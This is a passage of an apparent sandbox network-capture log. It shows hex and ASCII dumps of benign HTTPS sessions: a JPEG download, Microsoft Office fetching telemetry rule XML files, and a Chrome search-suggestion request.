Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: D2E26D0827A84C649A3B28A15E4F8318 Ref B: EWR30EDGE0219 Ref C: 2024-11-23T06:09:22Z Date: Sat, 23 Nov 2024 06:09:22 GMT Connection: close
2024-11-23 06:09:23 UTC	3517	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a a0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 32 38 3a 30 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:28:028
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: 58 f6 51 ee af 73 b6 7f 33 55 df f5 ab 13 4f 34 78 b4 89 e0 1b c8 ef f4 5c 39 7d 35 97 ab a0 1b 34 58 f2 79 3a 1e 7e 3e 2b a3 fa b3 d3 c5 95 d9 93 70 f6 64 96 d3 50 90 1c e6 31 de a6 46 cd c0 b5 ac dc da da f7 bb fd 15 ab 2e cb fa 77 af b1 f5 16 49 d2 ef 4e b7 56 63 f3 29 fb 2f a5 45 9e a7 e6 59 fa 16 7f c5 2b f8 5d 57 a9 9a 99 68 da 70 58 d1 66 2d 75 b1 ce 7b 5a d1 e8 56 f6 fa 0e 75 7f a1 76 cb bf 4a db ff 00 4d 55 4a b7 37 96 79 71 1c 70 1c 3c 55 c4 65 fb bf 37 0c 19 70 62 10 98 91 3c 55 b5 3d 61 7b ea 76 36 06 17 a6 1b bd d6 e6 dd 27 6b 6a 1f a4 c8 2e b5 c5 f6 57 93 6f a9 4e cf 51 de a3 f7 ff 00 3b e8 ae 33 a9 f5 47 60 75 af 5c 7e 9b 14 92 46 39 b6 c2 db 6b 07 6d 9b 5e eb 1f e8 da ff 00 4d 8f a6 cf f8 2a 3f 45 b3 f9 cb 99 3d 67 27 2f a7 5b 47 56 c7 6d Data Ascii: XQs3UO4x\9}54Xy:~>+pdP1F.wINVc)/EY+]WhpXf-u{ZVuvJMUJ7yqp<Ue7pb<U=a{v6'kj.WoNQ;3G`u\~F9km^M*?E=g'/[GVm
2024-11-23 06:09:23 UTC	4144	IN	Data Raw: d8 0d 51 dc 3e c8 f3 58 d7 17 31 da b3 49 23 6d dc df 2e da d2 14 dc 89 94 ac 6d f2 6a 0b f6 1e 4b 21 fe 2a 8b 4b bf 8e 5b 7c bb 7d da c6 f1 06 ae 21 b8 64 46 e1 be ed 5c 28 b7 2b 11 29 c5 23 27 c4 1e 5d aa b7 94 cd e6 2f 35 8b 6b a9 0f 39 4c ab fe f5 3f 5a b8 33 c8 c4 be ed d5 97 22 e1 6b d7 a7 49 72 ea 79 d5 2a 3e 6b a2 ed f3 e6 66 78 db e5 fe 1a a8 97 32 24 99 a6 2b 15 a4 6e 6b 45 04 8c 9c d9 2c d3 97 5e 7a d4 6a 46 ec d2 62 96 ab 95 0b 9d b2 dc 72 40 cb 82 bc d4 17 09 b1 72 8d 51 fc c2 86 24 f1 49 42 c3 73 1a af 20 fe 2a 7f 9f 29 fb cd 4d c5 1b 6a b9 51 3c cc 6b 0c b6 4d 2a 2d 3d 56 9c ab 4c 42 22 66 a5 44 a7 c3 1e 6a 55 4c 35 48 ec 31 23 ad 4d 13 41 d4 f5 59 15 2c ac da 40 df f2 d3 ee a2 fe 35 d2 7c 3d f0 67 f6 b4 6b 7f 7f ba 3b 75 93 e5 8b 6e df 33 Data Ascii: Q>X1I#m.mjK!K[\|}!dF\(+)#']/5k9L?Z3"kIry>kfx2$+nkE,^zjFbr@rQ$IBs )MjQ<kM-=VLB"fDjUL5H1#MAY,@5\|=gk;un3
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: 7a 53 71 50 79 be f4 be 77 cb 4e c0 4d bb 1c 54 33 31 1c 8a 6f 9b 51 49 20 a2 c0 33 ed 5f 36 0f 5a 8e e6 7c f3 55 ef 0e d6 cd 54 b8 9c 79 7f 7a a9 44 96 c9 a6 98 d5 59 a7 22 98 d3 0f 2f 96 aa 77 13 6e 6c 0a d1 44 92 e7 da 2a 29 27 c5 56 46 3b 69 ca 85 b9 34 f9 50 12 ac f9 eb 4f f3 4b 54 69 09 35 32 41 8a 2c 02 67 de 93 04 d4 9b 3b 53 bc b6 a0 06 46 b5 69 17 14 d8 53 e6 ab 2b 19 a4 c0 8a 85 53 52 f9 75 2a 45 43 01 90 c6 4d 58 8d 0d 3e 34 ab 29 1e 29 01 9b ac 5a 25 ce 9f 24 72 fd d6 5a f3 b6 82 d9 26 f2 9d b7 2a b1 ff 00 7a bd 37 58 5c e9 f2 fc db 7e 53 5e 59 7f 04 b6 97 8c 19 b7 16 e6 bd 0c 0a ba 67 1e 29 da ce c5 4b 98 c4 73 32 44 db 95 aa 1d b5 76 35 91 b9 30 7f e3 b4 db a8 76 36 36 ed af 4d 1c 0c ab b3 34 9b 71 56 56 23 b7 85 ab fa 5e 9c 27 99 7c df 95 Data Ascii: zSqPywNMT31oQI 3_6Z\|UTyzDY"/wnlD)'VF;i4POKTi52A,g;SFiS+SRuECMX>4))Z%$rZ&*z7X\~S^Yg)Ks2Dv50v66M4qVV#^'\|
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: 4c c9 e7 42 bf 77 2b 4e 54 a9 ad 63 46 9b 0e db 6a 64 34 67 98 fb 53 76 57 47 36 91 11 b7 de 25 da 5a b2 26 87 63 32 51 0a 8a 5b 0e 54 dc 77 29 6d a2 ac b2 d3 59 31 5a 19 90 6d a1 85 4d b2 8d 94 58 08 59 68 d9 53 32 51 b6 9d 80 81 96 8d b5 36 da 4d 94 01 0b 2d 15 2e da 36 d3 48 08 71 46 da 97 6d 26 28 b0 11 e2 8c 54 98 a3 6d 16 15 c8 f6 d2 6d a9 71 4b 45 86 43 b6 97 15 26 d1 46 da 2c 2b 8c 51 4e a5 c5 0a 29 72 a1 dd 82 9a 5c fb d2 63 14 b4 b9 50 f9 82 8c fb d2 ad 2d 1c a1 cc c6 e7 de 9e b2 3a f4 a6 e2 92 8e 41 f3 32 cd bd db c7 d1 aa 74 d4 a7 0b 8d d5 43 da 8c 62 a1 d1 8b e8 5a a9 25 d4 be da 8c fd 44 b4 f8 f5 09 37 72 d5 9a b4 aa 69 3a 11 ec 35 5a 5d cd ef ed 43 e4 f0 d5 5e 6b f7 3d 55 71 fe d5 65 ab 11 43 31 35 9a c3 c5 15 ed e4 fa 96 ae 2f 0c dc 3e dc Data Ascii: LBw+NTcFjd4gSvWG6%Z&c2Q[Tw)mY1ZmMXYhS2Q6M-.6HqFm&(TmmqKEC&F,+QN)r\cP-:A2tCbZ%D7ri:5Z]C^k=UqeC15/>
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: ce f1 2e 3a 49 1d eb 6c 35 13 48 16 b3 f4 9d 42 d2 4d 27 ef 33 49 d1 aa ad 85 f4 31 dc 34 17 2d c3 7d d6 ae 7f ab cb 5d 36 36 f6 cb 4d 77 36 5e e4 2a fd e5 a8 9b 50 80 70 59 6a a6 a1 63 24 d6 6b f6 69 79 5f f6 ab 97 d4 16 ee d9 b1 2e e5 6a d6 8e 1a 35 3a ea 67 52 b3 87 4d 0e d3 ed d6 e5 73 ba a3 b8 bb b4 96 16 8f 7a fc d5 c3 25 e5 c2 f2 25 6a 57 ba 95 9b 25 ab a3 fb 3f cc c7 eb a9 f4 2b 78 82 d0 43 a9 48 13 a5 50 55 ad 2b a6 79 3e ff 00 cd 55 7c bc 35 7a b4 ae a2 93 3c ea 8d 39 3b 0b 6c 91 ee fd e7 4a d2 59 ac 02 fc 90 7e f1 7f 8a b3 a3 4c f5 ad 04 b1 46 8f 74 6d ce da 8a 89 5f 52 a9 b7 6d 09 6d fc d0 cb 2d bc 4a bf f0 2a 2f 2f 2f 07 fa cd cb 4c b7 49 cc 78 fb a1 6a 59 12 7d aa 7e 59 45 65 ca ae 6b cc dc 4a 72 5c 79 bf eb 57 9f ef 54 0e 01 e6 a6 b8 56 32 Data Ascii: .:Il5HBM'3I14-}]66Mw6^PpYjc$kiy_.j5:gRMsz%%jW%?+xCHPU+y>U\|5z<9;lJY~LFtm_Rmm-J///LIxjY}~YEekJr\yWTV2
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: 9f aa a4 e6 45 48 be 53 27 de 65 a8 de 24 fb 2a c4 ec cb f3 67 ef 6d 6f c6 ae 31 4d 5f a9 51 64 30 db f9 5f bd 97 ef 37 dd f9 6a de 95 0c b2 5c 66 36 65 8d 5b 2f 25 45 bd f7 47 19 56 51 fc 2c df 77 eb 56 92 59 6d a3 91 22 58 fd 16 46 6f 9b 27 fd 9a 27 76 8a 8b 46 96 9f 7e 16 e1 77 b4 92 96 cf 97 b9 7e 58 fd ea 59 ef 27 9e 65 0f 2a b4 31 64 aa af de 63 ea 6b 26 da 2f 22 36 94 ff 00 ae 6f ee ff 00 85 51 46 b8 92 e9 8c 6d cb 71 b9 ab 15 87 8b 6d a3 5f 6a d2 2c f8 a2 ff 00 ed 10 e0 ee f9 7e ef f0 ad 61 ab 19 19 70 bc b2 fc ca df d2 af 5c c2 64 dc 77 79 bb 7f d9 da b5 46 39 63 13 79 52 c1 b4 2f dd f9 6b ae 94 23 18 d9 1c d5 24 dc b5 25 b7 8e 31 0f 0d b7 e6 fd e5 3d 6e 2d 8b 2c 69 17 1d 19 a9 9e 5e 79 8d 95 43 7f 7a 9f 1c 48 bc be df f6 9a af 95 13 73 43 4d b0 Data Ascii: EHS'e$gmo1M_Qd0_7j\f6e[/%EGVQ,wVYm"XFo''vF~w~XY'e1dck&/"6oQFmqm_j,~ap\dwyF9cyR/k#$%1=n-,i^yCzHsCM
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: 78 a3 5e 15 5a a3 99 b1 a4 91 9f 6f 71 70 cb 87 8b 75 3a 6b 3b 6b e5 d9 73 02 c8 3f da a9 1a ec 1f e1 da 29 1a ee 25 e0 75 ff 00 66 8b be 83 21 b5 f0 d6 97 1b 71 06 e1 fd d6 6f 96 af c7 a7 d9 45 c4 70 46 a3 a7 dd 14 e8 66 26 3d e5 76 ee a3 cc 26 4f 6a 6e 52 7b b2 54 57 62 ae a9 a2 e9 97 91 b0 92 ce 3c b7 f1 2a ed 6f ce b1 97 c0 b6 0d 26 45 cc 9b 3f bb c7 f3 ae ad 42 32 f1 d6 a2 75 95 7a 55 c2 b5 48 2b 46 44 3a 70 96 e8 c2 9b c1 7a 57 d9 7c b4 56 59 3f e7 a6 ef 9a b3 26 f0 32 ee fd dd f6 d1 fc 5b 96 bb 04 94 ee c1 a9 78 3d 3e 6a b8 e2 6b 47 69 12 e8 53 7b c4 e7 e4 f0 c6 9e 6c e3 88 c4 b2 32 ff 00 1b 53 1f c1 1a 59 87 ef 48 ad bb ef 2b 57 4d b4 15 e3 ad 39 7e 65 e6 a5 57 a8 b6 93 1b a5 4d f4 38 eb ff 00 03 da f9 39 b5 b9 91 5b fd af 99 69 ba 6f 82 e0 db 1b Data Ascii: x^Zoqpu:k;ks?)%uf!qoEpFf&=v&OjnR{TWb<*o&E?B2uzUH+FD:pzW\|VY?&2[x=>jkGiS{l2SYH+WM9~eWM89[io
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: 0e ac c4 9c 01 fe 46 a7 c2 9d 3f 53 b4 f8 6f ad 5e 25 9d de eb ac 79 5b 7e 5f 39 17 92 50 0e 78 f5 e9 49 a1 ea be 2c d5 66 8b 47 b6 b9 6b 18 a7 51 0f cc db 9a 3c 64 a8 dc 00 d9 93 9e 33 9c d7 93 88 c6 e2 27 56 71 a5 34 a3 1d 3f cd ff 00 c0 08 d3 49 2b ad cd 9d 6a c3 43 b2 f0 7c ba 5e 97 6d 77 20 b3 80 3d cc b3 db 05 4f 33 3d c1 1c b5 72 3a f7 c4 1d 42 48 60 b4 b7 f2 ec ec e3 81 a1 93 6c 60 79 c3 d7 e5 03 3f 37 e1 5e dd e0 9d 1b 50 d1 7c 27 06 9d a8 6d 9e fe 25 67 97 cb 60 c8 a4 fa ff 00 7b d3 bd 78 8f c5 21 1c f7 90 07 69 24 6b 66 29 e5 ac 61 23 8c 0e bb 7d 5b 3f 85 78 b9 2e 36 9e 2b 13 38 b5 cc 93 76 95 fe 57 b5 8d 2a 45 c2 29 ad 0d ff 00 84 7a 4f db 7c 0b 79 e6 5f 34 1f 6a 90 cd 73 2f 3b 99 14 7c ab f9 9c f3 ed 5d f7 81 6d 52 eb 52 b3 9f ec 2a b0 c4 a6 Data Ascii: F?So^%y[~_9PxI,fGkQ<d3'Vq4?I+jC\|^mw =O3=r:BH`l`y?7^P\|'m%g`{x!i$kf)a#}[?x.6+8vWE)zO\|y_4js/;\|]mRR
2024-11-23 06:09:23 UTC	8192	IN	Data Raw: 18 2d f1 14 12 2f f7 a4 6c ee e7 da ab 2c 43 cc cc 7b b0 df 75 59 be 5f c6 84 d8 32 28 d0 7d cf 29 a4 2a df 75 5a 9d 19 29 27 de ff 00 c7 aa 64 b4 79 ad 59 c7 ee d9 7e ef 96 a6 aa 5e 24 1f 2c 63 e5 75 5f 95 aa d3 4c 97 a0 f9 14 96 6c b7 0d 51 db c3 21 56 1b b6 86 fe ea fd ea 55 91 d2 46 47 66 f9 71 b7 6f f8 d2 2a 49 2c 9b 03 70 d5 76 76 25 b4 6a 69 71 49 b5 49 5f 2e 3f ef 7f 78 d3 af 27 8f e6 8a dd 9a 41 bb e6 f2 fd 7d cf f8 53 2d d4 22 aa 6e f3 0c 6b f7 99 a8 71 6f 1a b1 93 76 5b ee aa fc ab 5c af e2 34 5a 22 3b 83 20 5f 32 4f 98 ff 00 0c 7b b6 d5 67 95 cb 2c 09 17 bb 6d f9 bf 5a b8 91 a4 92 34 b3 ae df 2d 72 ab b8 7c be e6 b3 af a5 97 c9 90 a4 4b 1a b3 7d e5 c2 ee 1e c2 ae 2a e2 93 16 de 29 26 91 9e 4f ba bc ed 5a 9d d3 2b 89 55 98 2f dd 5f ba ab 49 09 Data Ascii: -/l,C{uY_2(})uZ)'dyY~^$,cu_LlQ!VUFGfqoI,pvv%jiqII_.?x'A}S-"nkqov[\4Z"; _2O{g,mZ4-r\|K}*)&OZ+U/_I

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.6	49735	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:23 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:23 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 657d02d2-201e-0033-2f57-3cb167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060923Z-178bfbc474bmqmgjhC1NYCy16c000000044g000000008k7m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:23 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	49736	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:23 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:23 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 51fbd25c-e01e-0020-5e4d-3cde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060923Z-15b8b599d88z9sc7hC1TEBkr4w00000002q00000000070uk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:23 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.6	49738	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:23 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:23 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060923Z-178bfbc474btvfdfhC1NYCa2en000000043g00000000b6rt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:23 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.6	49737	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:23 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:23 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: e9522a88-801e-0067-2316-3dfe30000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060923Z-178bfbc474bh5zbqhC1NYCkdug00000003x000000000hbtx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:23 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.6	49739	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:23 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:23 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: de6003cd-b01e-0098-493c-3ccead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060923Z-178bfbc474bscnbchC1NYCe7eg000000045000000000dwgf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:23 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49744	142.250.181.100	443	7260	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:24 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-23 06:09:24 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:24 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-6DfVZdiTfdZ1QFEySt25Tw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: 